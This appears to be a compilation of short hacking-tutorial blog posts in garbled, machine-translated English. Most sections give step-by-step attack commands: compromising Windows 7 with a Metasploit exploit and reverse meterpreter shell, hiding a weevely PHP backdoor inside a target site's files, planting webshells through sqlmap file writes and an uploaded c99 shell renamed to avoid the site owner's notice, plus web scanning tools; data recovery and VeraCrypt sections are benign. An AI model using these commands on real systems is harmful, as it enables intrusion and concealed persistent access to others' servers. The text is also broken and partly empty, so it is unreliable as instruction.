HOW TO HACK WINDOWS 7

1. First we need to know is the target of the IP addresses it can we get when carrying out IG (Information Gathering)
2. after we know our targets nuka IP terminal and typing the command "ip nmap -A target"
then enter it will show a gap which could be executed.
3. then go to metasploit using "msfconsole"
4. then we choose to use the exploit which one? here I will use the "msf> use exploit / windows / http / rejetto_hfs_exec"
5. after it was set to be used payload type the command "set payload windows / meterpreter / reverse_tcp"
6. and then type the command "exploit"
7. then after appearing "meterpreter>" then you are logged into Windows 7

The next whatever you want anything there .... now it's yours windows

Recovery back the data on the Flasdisk that has been erased

on this occasion I will discuss about how to recover data that has been deleted in data storage, such as flasdisk, external hard drive and the other:
1. we open a terminal and type the command "testdisk / dev / sdc" sdc here is usb who want me to appear back data.

 
2. after appearing command enter "proceeds" press enter "and then select" intel "press enter and then select" analyze "and then select the command" quick search "answer yes and continue

 
3. then press the "P" to see the list that never erased

 
4. then select the file you want in recavery press "c" and select where to save it and then press the "c" back

 
5. after the command "copy done" look back to the place where you store.

 

Thus was cursory knowledge that I share today Morning All

How Do We Secure Data

to anticipate when a laptop or flash or hard drive is stolen or fall and we are in it no confidential data so it's good we do our security by encrypting data.

1. First we download via google apps veracript
2. then after the download extract and install.
3. the following command to menjalanjan "./veracrypt-1.13-setup-gui-x86"
4. if the terminal ask permission then type the following command:
      "root @ times: ~ / Downloads chmod 777 veracrypt-1:13-setup-gui-x86"
5. then repeat the command to run veracrypt
       "root @ times: ~ / Downloads # ./veracrypt-1.13-setup-gui-x86"
6. The following command will display "
       "Verifying archive integrity ... All good.
     Uncompressing VeraCrypt 1:13 Installer .. "

7. after the run then just follow the steps on the screen of your laptop monitor.

Create a backdoor by using weevely, insert into the target web and backdoor access through the terminal

Once Backdoor C99.php we upload to the web, now we will try to insert a php script that we make with weevely into the web and hide it in php files belonging to the target web.

 1. Create a file using the backdoor php weevely with the following command:
# Weevely generate 1234 silentbd.php

 2. Copy the script that is in the php file that we created earlier in the php file that is in the target web,here I will try to insert the script in the view_source_all.php file in the web directory.  
Then the backdoor access through the terminal with the following command:
# Weevely http: // web ipaddres target / folder / name backdoor password
# Weevely http://192.168.1.123/dvwa/vulnerabelity/silentdb.php 1234

 

easy does not it? yes of course easier if you are willing to learn and read more certainly will be more stable

Upload Backdoor using sqlmap

Here I will give you a little lesson to install a backdoor file using sqlmap.

1. The first is whether to copy the URL belongs to the target, here when the target URL using GET metod we can directly copy, however when using POST metod we use burpsuite prior notice.
  

2. We will try to install a backdoor on the web dvwa using backdoor file is available in the directory:
# cd /usr/share/webshell/php/php-backdoor.php
then move the file to the root directory
#cp php-backdoor.php / root /

3. We will install a backdoor file which we prepared earlier in the web with the command:
# sqlmap /root/dvwa.txt -l -p "id" --file-write = / root / php-backdoor.php --file-dest = / var / www / dvwa / hackable / uploads / php-backdoor. php

and if it appears like the image above means you have succeeded in planting a backdoor

Upload Backdoor C99.php of backdoor that you have uploaded to the web.

to do this we first entered http://r57shell.net/ website for downloading one file backdoor, which will be used.

1 . Download the file from the internet c99.pnp.rar, then extract the file, rename it according to our wishes, but must be with an appropriate name so as not suspicious, then move the file into the root directory

 2. Through the first backdoor we will upload backdoor c99.php, specify where the file will be put
 

3. I will put the file c99.php in dvwa directory on the web. Once the file is uploaded and then try to access the file on the web.

and finally a second backdoor can we enter into a website but do not forget to menyaarkan his name so as not to be discovered the owner

Scanning web by using multiple applications

1. BURP SUITE

 Run Bruphsuit in order to see the parameters that runs on the web, after getting the parameters sent to the tool spider, the spider is a useful tool to scan any link contained in a web in order to find security holes that we can use.

repeater function to analyze links that are
on the web without having to repeat intercept many times.

2. DIRBUSTER

Dirbuster application serves to locate the folder contained in a web that has a security vulnerability that can be used as a place to put the backdoor.

 










3. NIKTO

Nikto useful application to scan the web as a whole regardless of the web is built using terentu application.

Information gathering with whatweb, joomscan, and wpscan

1. We can gather information manually too but in this tutorial we will be using a tool in times of linux called "WhatWeb" for information gathering and via this whatweb tool we will be Able to collect a tasty information about our targeted server and web application. This tool will dump all the important information the which is Necessary to launch our attack.

Open the terminal in Kali Linux  Now in the second step type the command to gather information about your target ( i.e server ip or domain ). Now when you will enter the command , it will display all the possible information about the web server and web application. If you want more in-depth information gathering you can also do it with the same tool by entering a customized command which is below.

2. Joomscan

  is one of the tools used to metasploit
inspect or scan weakness / bugs / vurnerability of a website
based CMS (Component Management System) Joomla. Well it at a glance
My understanding of the joomscan.

 

 

Joomscan can be used if the web is using Jomla, joomscan very helpful in gathering information.

 

3. WPSCAN

  function is peeking version of WordPress website. Not limited to that, he could even be used to see the gap of a plugin / theme used your website. Which is vulnerable and allows infiltrated hacker.WPSCAN in this stage will be compared with a list of plugins that contain security holes that can be exploited. So blia found plugins accordance with perforated plugin list, a link will be displayed directly alongside a further explanation to the exploitation of the plug-in, as well as what applications can be used to exploit the hole.

 

ZAP

ZAP is a tool to search and find the loopholes that exist on a website, at this meeting I would give most of the science that I just got from God through his servants ... follow the steps as shown below

CRACKING PASSWORD WITH JOHN

LOOK MY SCREENSHOOT VERY VERY EASY THANK'S

SQL INJECTION BYPASS AUTENTICATION AND SQLMAP

INFORMATION GATHERING

information gathering
 
1. The first method we will use google hacking. look like the picture below.

and see what we can do AMAZING 
2. The next way we will use the command linux terminal dr ̈whatweb̈

and see what we can do all the information appears in front of the eyes stay of execution 
3. The third way we can get with this ̈joomscan̈ also dr linux terminal

 
4. The last I discussed using ̈wpscan̈

You want to see how it works? search and come to me not in this web thank's